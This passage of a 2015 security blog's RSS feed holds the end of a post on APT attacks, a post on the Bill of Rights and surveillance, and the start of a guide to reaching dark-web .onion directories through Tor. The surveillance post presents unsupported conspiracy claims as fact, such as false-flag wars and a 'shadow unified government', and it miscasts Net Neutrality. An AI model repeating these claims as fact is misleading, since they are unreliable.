&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Leak of secret data and company secrets&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Data and infrastructure corruption&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Compromise other hosts&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Privilege Escalation &lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Encrypt critical files and demand ransom to decrypt them&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Etc.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;u&gt;&lt;b&gt;Final Thoughts&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;As we are going through a war phase, a lot of attacks are being made with digital weapons.&amp;nbsp; More intrusive controls such as better digital IDS/IPS signatures, more skilled people, firewall rules and anti-virus behavioral scans as well as signatures (come on, they do help a little) are falling behind exponentially with the emergence of more sophisticated APT malware.&amp;nbsp; With the evolution of cognitive systems, soon we won&#39;t have to enlist to fight wars because machines will be able to fight them for us.&amp;nbsp; The hacking techniques now being used are almost automatic and will soon be cognitive and conducted with the help of a more accurate AI (artificial intelligence).&amp;nbsp; In this information age, not only critical infrastructure but also the whole society&#39;s information is the target and at risk minute by minute.&amp;nbsp; That is why we need to be our own firewall and not only be diligent about our activities and actions (they do cause an effect), but also about how we determine our future.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ4IO-2jCZU3G3tn7Yoe59Fq6K3x8DT5scH55yCbsW6EZNJjVX97SPEZsu74GmMOEvWWJlJLWyERHN1ucqWgOguKzVXZNPFRuyo3r1wtdDdzGxUTqnhvQHM3B8jC6MU6WAdXgumAijoHxX/s1600/human-firewall.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ4IO-2jCZU3G3tn7Yoe59Fq6K3x8DT5scH55yCbsW6EZNJjVX97SPEZsu74GmMOEvWWJlJLWyERHN1ucqWgOguKzVXZNPFRuyo3r1wtdDdzGxUTqnhvQHM3B8jC6MU6WAdXgumAijoHxX/s1600/human-firewall.jpg&quot; height=&quot;454&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
</description><link>https://unsecuritynow.blogspot.com/2015/04/evolution-of-hacking-apt.html</link><author>noreply@blogger.com (UnsecurityNow)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnT_lCnlUrM9zJZOoJuxWrFCkahiFk_IH8lab_bkt5ch8HuVsTz6joFmQfEs259ToooxQ4HuqUgRZ3c3sPjb1Apm-JPHMueAxNWYzv7OQqRujq375YJKNrtv66Sg8DLqpFmEzNTWe9EUHU/s72-c/ISACA-APT01.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-6772581829474158502</guid><pubDate>Fri, 27 Mar 2015 17:00:00 +0000</pubDate><atom:updated>2015-04-15T17:50:37.549-05:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">assange</category><category domain="http://www.blogger.com/atom/ns#">dystopia</category><category domain="http://www.blogger.com/atom/ns#">five_eyes</category><category domain="http://www.blogger.com/atom/ns#">freedoms</category><category domain="http://www.blogger.com/atom/ns#">governments</category><category domain="http://www.blogger.com/atom/ns#">greenwald</category><category domain="http://www.blogger.com/atom/ns#">manning</category><category domain="http://www.blogger.com/atom/ns#">net_neutrality</category><category domain="http://www.blogger.com/atom/ns#">patriot_act</category><category domain="http://www.blogger.com/atom/ns#">privacy</category><category domain="http://www.blogger.com/atom/ns#">security</category><category domain="http://www.blogger.com/atom/ns#">snowden</category><category domain="http://www.blogger.com/atom/ns#">speech</category><category domain="http://www.blogger.com/atom/ns#">surveillance</category><category domain="http://www.blogger.com/atom/ns#">tpp</category><category domain="http://www.blogger.com/atom/ns#">trans-pacific</category><title>The Bill of Rights</title><description>&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
&lt;/xml&gt;&lt;![endif]--&gt;

&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA0TlJhjlkh52ppr8dW8uhLRHH9v1lzq12mRJpGn3ZrBEJZ2dv6zz6ZaTK-P6x5BxC-OLqNeHIU5h642l5UJUBEONmmmmJaVc34RCGikBRJ1AgrCRrFz8Fooc0fnyAAiHV07kplgXc1kr1/s1600/freedoms_lost_by_frani54-d4shaxf.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA0TlJhjlkh52ppr8dW8uhLRHH9v1lzq12mRJpGn3ZrBEJZ2dv6zz6ZaTK-P6x5BxC-OLqNeHIU5h642l5UJUBEONmmmmJaVc34RCGikBRJ1AgrCRrFz8Fooc0fnyAAiHV07kplgXc1kr1/s1600/freedoms_lost_by_frani54-d4shaxf.jpg&quot; height=&quot;640&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 200%;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10pt; line-height: 200%;&quot;&gt;&amp;nbsp;Privacy is affected in many
ways.&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp; &lt;/span&gt;The Bill of Rights covers not only the
privacy of practicing your own religion and assembling at your own place
without being detained, but also your privacy after you are detained to testify about a
crime that you haven&#39;t seen or have no more details to add to.&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp; &lt;/span&gt;It also covers the freedom to have your own thoughts
or ideas as long as they do not affect a third party (freedom of speech), the
right to bear arms (as long as you have a valid gun license) and the freedom to
decide whether a militia, navy or army man should stay at your house while
the nation is “under peace.”&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp; &lt;/span&gt;Certain
rights affirm that we are still free, but some of them, such as the
freedom of speech, are a double-edged sword.&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;
&lt;/span&gt;If you speak badly about certain things just because that is what you think,
and someone sensitive feels annoyed or hurt, you could be in trouble.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 200%;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMCYKLNQoKVfTu3DmgBCOWr95cjOQhJFvPqU5Pa2_qmUBNWx23ICtRs6lV9WSICuLoInuQFfpKWMLoU2fhVRTiR_vdhr0Uu0dOiMXodnsGbqoveUYG8dj_-eRjvduKkhFJvWeJr2l20jeg/s1600/bill-of-rights.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMCYKLNQoKVfTu3DmgBCOWr95cjOQhJFvPqU5Pa2_qmUBNWx23ICtRs6lV9WSICuLoInuQFfpKWMLoU2fhVRTiR_vdhr0Uu0dOiMXodnsGbqoveUYG8dj_-eRjvduKkhFJvWeJr2l20jeg/s1600/bill-of-rights.jpg&quot; height=&quot;458&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 200%;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 200%;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10pt; line-height: 200%;&quot;&gt;The same goes for the government.&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp; &lt;/span&gt;If the government thinks you have hurt it,
your freedom of speech is no longer free, and you will be punished for it.&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp; &lt;/span&gt;It depends a lot on how people, entities, and
governments take your argument.&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp; &lt;/span&gt;Of
course, this is more prevalent when there is an abusive system.&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp; &lt;/span&gt;People would then rather not even express their
opinions, and that is where freedom of speech is lacking.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 200%;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10pt; line-height: 200%;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUt1k0jI6X4xtnCmq0ec9VkfXzDwJlsO-w_ucdd-lubQG9tfMmqzyyj0zC1ZsF7xE_plyvUgoLxWMyqtkTeEmL1hi9-2tgHOwj61EABBwx9r5NejtN-3LtYrJPsGsW2HYJcqmtAdjJIs_N/s1600/NDAA-BoRits-suspend1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUt1k0jI6X4xtnCmq0ec9VkfXzDwJlsO-w_ucdd-lubQG9tfMmqzyyj0zC1ZsF7xE_plyvUgoLxWMyqtkTeEmL1hi9-2tgHOwj61EABBwx9r5NejtN-3LtYrJPsGsW2HYJcqmtAdjJIs_N/s1600/NDAA-BoRits-suspend1.png&quot; height=&quot;462&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 200%;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 200%;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10pt; line-height: 200%;&quot;&gt;Since after 9/11, not only we can see a proliferation of
abuses not only to the Bill of Rights but also seen on top-secret papers
exposed by whistle-blowers such as Chelsea (former &lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10pt; line-height: 200%;&quot;&gt;Bradley) &lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10pt; line-height: 200%;&quot;&gt;Manning and Edward Snowden as well
as by journalists such as Glenn Greenwald and Julian Assange dismantling
horrific projects and operations from the NSA as well as from the Five Eyes
(an intelligence alliance comprising Australia, Canada, New Zealand, the United
Kingdom and the United States).&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp; &lt;/span&gt;Little
by little our freedoms are diminishing in the name of “National Security” with
freedom-interfering Acts such as the Patriot Act (especially Section 215), Net
Neutrality, Trans-Pacific Partnership (TPP) and other mass-surveillance
programs.&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp; &lt;/span&gt;People need to wake up before
it is too late, because we are now facing the end of “our own control” times.&lt;span style=&quot;mso-spacerun: yes;&quot;&gt; &lt;br /&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj8n5fHULHZ9ELm8zbVBuvZSF0nMSMW9huUA3bCMXHg64-8bzqeDO7bVlvmif8H-wmlC2xPNlUVhyZoqHdTuZwUXw9iIxZqzrt4iMDBnK4ANhGbXRg6XBTPK6VJIP0Wtf0GwgA_iSIjITR/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj8n5fHULHZ9ELm8zbVBuvZSF0nMSMW9huUA3bCMXHg64-8bzqeDO7bVlvmif8H-wmlC2xPNlUVhyZoqHdTuZwUXw9iIxZqzrt4iMDBnK4ANhGbXRg6XBTPK6VJIP0Wtf0GwgA_iSIjITR/s1600/images.jpg&quot; height=&quot;358&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 200%;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10pt; line-height: 200%;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 200%;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10pt; line-height: 200%;&quot;&gt;We are rapidly and nefariously losing our
freedoms in the name of “security”, being sold a plethora of dystopian realities
fabricated by false-flag operations such as the endless wars we are facing now
as well as producing horror propaganda orchestrated by a shadow unified
government with terrorist groups using their best weapon:&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp; &lt;/span&gt;media disinformation.&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp; &lt;/span&gt;We need to act and we need to act now because
as Benjamin Franklin once said:&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp; &lt;/span&gt;“Those
who give up their liberty for more security deserve neither.”&lt;/span&gt;&lt;/div&gt;
</description><link>https://unsecuritynow.blogspot.com/2015/03/the-bill-of-rights.html</link><author>noreply@blogger.com (UnsecurityNow)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA0TlJhjlkh52ppr8dW8uhLRHH9v1lzq12mRJpGn3ZrBEJZ2dv6zz6ZaTK-P6x5BxC-OLqNeHIU5h642l5UJUBEONmmmmJaVc34RCGikBRJ1AgrCRrFz8Fooc0fnyAAiHV07kplgXc1kr1/s72-c/freedoms_lost_by_frani54-d4shaxf.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-647515546614779650</guid><pubDate>Fri, 20 Mar 2015 17:00:00 +0000</pubDate><atom:updated>2015-04-05T15:54:02.462-05:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">censor</category><category domain="http://www.blogger.com/atom/ns#">darknet</category><category domain="http://www.blogger.com/atom/ns#">deepweb</category><category domain="http://www.blogger.com/atom/ns#">governments</category><category domain="http://www.blogger.com/atom/ns#">hidden</category><category domain="http://www.blogger.com/atom/ns#">HTTPS/2</category><category domain="http://www.blogger.com/atom/ns#">i2p</category><category domain="http://www.blogger.com/atom/ns#">internet</category><category domain="http://www.blogger.com/atom/ns#">Internet 2</category><category domain="http://www.blogger.com/atom/ns#">IP</category><category domain="http://www.blogger.com/atom/ns#">networks</category><category domain="http://www.blogger.com/atom/ns#">secret</category><category domain="http://www.blogger.com/atom/ns#">societies</category><category domain="http://www.blogger.com/atom/ns#">surveillance</category><category domain="http://www.blogger.com/atom/ns#">tor</category><title>Meet The Hidden Web</title><description>&lt;u&gt;&lt;b&gt;Terminology&lt;/b&gt;&lt;/u&gt; &lt;br /&gt;
&lt;br /&gt;
Also known as the Dark Web, Deep Web, Darknet or darkweb, whatever is left out of search engine indexes is located in these darknets. Whatever name is used, according to NPR.org, the deepweb makes up 96% of all content, far more webpages than the World Wide Web. What we cannot see with our &quot;naked&quot; eye (or in this case with traditional methods) is known to be unknown, but thanks to services such as Tor or I2P, we can actually experience the full potential of information flow.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWctaZnWRFjdjKCttWgDhLUGne4bWe7yCOwvNBskb9UOIXADFHcjUmltDvwpifRgVWXOCg5OZ8XQzuMfHy4BKxr6sZu01Uc78v8B_csUjJAp0jjdbAJLR5RUXhWA2F0sVcUWtTxzP5VnuQ/s1600/anonymity-darknets-and-staying-out-federal-custody-part-one-deep-web.w654.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWctaZnWRFjdjKCttWgDhLUGne4bWe7yCOwvNBskb9UOIXADFHcjUmltDvwpifRgVWXOCg5OZ8XQzuMfHy4BKxr6sZu01Uc78v8B_csUjJAp0jjdbAJLR5RUXhWA2F0sVcUWtTxzP5VnuQ/s1600/anonymity-darknets-and-staying-out-federal-custody-part-one-deep-web.w654.jpg&quot; height=&quot;422&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Now, how can we know what is indexed and what is not? Well, for the most part it is very hard to know without delving into the darknet itself, but some of it can be found in the &quot;robots.txt&quot; file of some websites. As previously stated in one of my &lt;a href=&quot;http://unsecuritynow.blogspot.com/2015/03/penetration-testing-with-google.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Blogs&lt;/a&gt;, the robots.txt file can be easily accessed, for example, on this &lt;a href=&quot;http://www.oak-brook.org/robots.txt&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;website&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
When connecting to the deep web, you can tell a site is non-indexed because its address is randomly assigned and has a .onion extension after the domain name; for example, DuckDuckGo&#39;s search engine website is http://3g2upl4pq6kufc4m.onion. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;How to Access It&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
As with everything in my Blog entries, I do not condone anything illegal or foolish. Use the darknet at your own discretion. You can find horrific, ugly things, just as you can also find beautiful lost pieces of information.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_RxSsiedASmS4H_HvqIWxpYeeas38gs2mGiywZKm9D7eiNmM6AuMwkNLf8hdy86gZl8F8CYSypGZGRIaxLdCf9LvVBW1A93fLI3o5zOEbefZFb1cQNpwZF7WWWPvCVQLFB2erwcjPDVrz/s1600/tor1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_RxSsiedASmS4H_HvqIWxpYeeas38gs2mGiywZKm9D7eiNmM6AuMwkNLf8hdy86gZl8F8CYSypGZGRIaxLdCf9LvVBW1A93fLI3o5zOEbefZFb1cQNpwZF7WWWPvCVQLFB2erwcjPDVrz/s1600/tor1.jpg&quot; height=&quot;340&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The way to access the .onion sites is through Tor. As previously stated in my numerous Blogs, Tor was invented by the U.S. Navy in the mid-90&#39;s and it provides fairly anonymous access to the Internet as well as to I2P and .onion sites (darknets). Tor can be used not only by people who want to hide their &quot;activities&quot; but also by people in countries like Egypt, Libya, Afghanistan, etc. who don&#39;t have complete access to the Internet and information.&amp;nbsp; Also, a lot of criminals such as paedophiles, hitmen, cyber-criminals, cyber-bullies, and drug and gun dealers access the darknets as well as black markets to sell their goods in an anonymous way.&amp;nbsp; These last uses are the reasons why darknets are considered dangerous.&lt;br /&gt;
&lt;br /&gt;
There are easy and fast alternatives such as the &lt;a href=&quot;https://www.torproject.org/projects/torbrowser.html.en&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Tor Browser&lt;/a&gt; which takes care of the tedious install and proxy configurations but it is not guaranteed that Tor will be 100% anonymous &quot;out of the box&quot;. Further configuration is always required.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqRogVqMhsn5Y_VGcw5t_YYsPsoGWMJdtogekGCB-rQGCF07eo6HWsFCghagnLM-gpNClXslg7c70-ETjTtPCt5EKTkDSPynHezLJZrPryghQ3RwsHRXwJ5qmUdMxz0LfYPj8m40mznA-V/s1600/nsa-tor-hack.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqRogVqMhsn5Y_VGcw5t_YYsPsoGWMJdtogekGCB-rQGCF07eo6HWsFCghagnLM-gpNClXslg7c70-ETjTtPCt5EKTkDSPynHezLJZrPryghQ3RwsHRXwJ5qmUdMxz0LfYPj8m40mznA-V/s1600/nsa-tor-hack.jpg&quot; height=&quot;360&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Even though Tor has had some issues with bugs, security flaws and, potentially, NSA surveillance and spoofed relays used to spy on people, it is not wise to judge the whole Tor project because of some rotten potatoes in the past.&amp;nbsp; A lot of flaws were and are being fixed every day, as in other software on the market. After all, Tor is also based on software and protocols which are being fixed and improved all the time. Also, it is not safe to consider Tor bullet-proof for all your &quot;hidden&quot; activities, but it is a good choice as an extra security layer to have in your security arsenal.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Where to Look&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8FSvO7HFDpuoQkQHotKryWETDgWboRTP7N6_xenyIGwtRx0OeIgfsBEqcXrDG_7dMsmaZFalnif6y8EvpWUOGKN5fF5qkUh_QeBehXNRKT7Nn718N6kcNz79CB4B4qRgDyiOXvLXL0_g0/s1600/tor-browser-4.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8FSvO7HFDpuoQkQHotKryWETDgWboRTP7N6_xenyIGwtRx0OeIgfsBEqcXrDG_7dMsmaZFalnif6y8EvpWUOGKN5fF5qkUh_QeBehXNRKT7Nn718N6kcNz79CB4B4qRgDyiOXvLXL0_g0/s1600/tor-browser-4.jpg&quot; height=&quot;500&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Once you connect to the Tor Network, you can see who in the network is acting as a relay.&amp;nbsp; The relays are run by people helping to make your connection more secure. The entry and exit nodes (you and the server) are the only ones who know about the site you are trying to visit (not the relays), and they also think your connection comes from another country.&amp;nbsp; Also, it is important to note that the only unencrypted part is from the exit relay to the destination.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIq9IGAudWZ24qKysT25El_ef4E_ki-fnrkrttlOVmZy4jsjtH4MiChBHc6q-ydca9l3hZN8eBsiadOJX4ozrm6eL1FC3wlZefyVnbOlEIXldHiWyIyhKpQ3-kKfdjSgqPJuN7L5B5zFGi/s1600/Tor+software.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIq9IGAudWZ24qKysT25El_ef4E_ki-fnrkrttlOVmZy4jsjtH4MiChBHc6q-ydca9l3hZN8eBsiadOJX4ozrm6eL1FC3wlZefyVnbOlEIXldHiWyIyhKpQ3-kKfdjSgqPJuN7L5B5zFGi/s1600/Tor+software.png&quot; height=&quot;356&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCtxjANBErCnVCFDrgJnaxgvdlJMCnrpOzSNBB4V3zG-LmdkWge-T6H2_xYeItdS-iM5IUZQqOZysWXnMOE_JJP3xdNgHyQOy_qQXHm-Yc_3CwDvZ2w21p5FmlJxR_O5QgQotVqjr82XhA/s1600/Onion_Routing.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCtxjANBErCnVCFDrgJnaxgvdlJMCnrpOzSNBB4V3zG-LmdkWge-T6H2_xYeItdS-iM5IUZQqOZysWXnMOE_JJP3xdNgHyQOy_qQXHm-Yc_3CwDvZ2w21p5FmlJxR_O5QgQotVqjr82XhA/s1600/Onion_Routing.png&quot; height=&quot;552&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
All of this is only to understand a little how Tor works, but let&#39;s get to how to surf the deep web.&lt;br /&gt;
&lt;br /&gt;
For starters, let&#39;s first find a starting point. To find a starting point, we need either 1) an .onion site with a list of other sites or 2) a search engine for deep web sites.&amp;nbsp; The reason why the first one is not very reliable is because the list is always out of date and the links might not work. The original one is called &lt;a href=&quot;http://eqt5g4fuenphqinx.onion/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;CoreOnion&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
1) There are sites that list, or at least try to list, the most up-to-date links. Some of them are: &lt;a href=&quot;http://kpvz7ki2v5agwt35.onion/wiki/index.php/Main_Page&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;The Hidden Wiki&lt;/a&gt;, &lt;a href=&quot;http://dppmfxaacucguzpc.onion/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Tordir&lt;/a&gt;, and the &lt;a href=&quot;http://32rfckwuorlf4dlv.onion/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Onion URL Repository&lt;/a&gt; (You will need to be running Tor to enter these sites).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2) You can also look at deep web search engines for .onion sites. Some of them are: &lt;a href=&quot;http://3g2upl4pq6kufc4m.onion/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;DuckDuckGo&lt;/a&gt;, &lt;a href=&quot;http://hpuuigeld2cz2fd3.onion/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;DeepSearch&lt;/a&gt;, and &lt;a href=&quot;http://nstmo7lvh4l32epo.onion/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Abyss&lt;/a&gt;. (You will need to be running Tor to enter these sites).&lt;br /&gt;
&lt;br /&gt;
Once you have a starting point, you can surf at your own discretion. You will find a lot of information about just about anything, and I mean ANYTHING.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Deepweb and Censorship&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
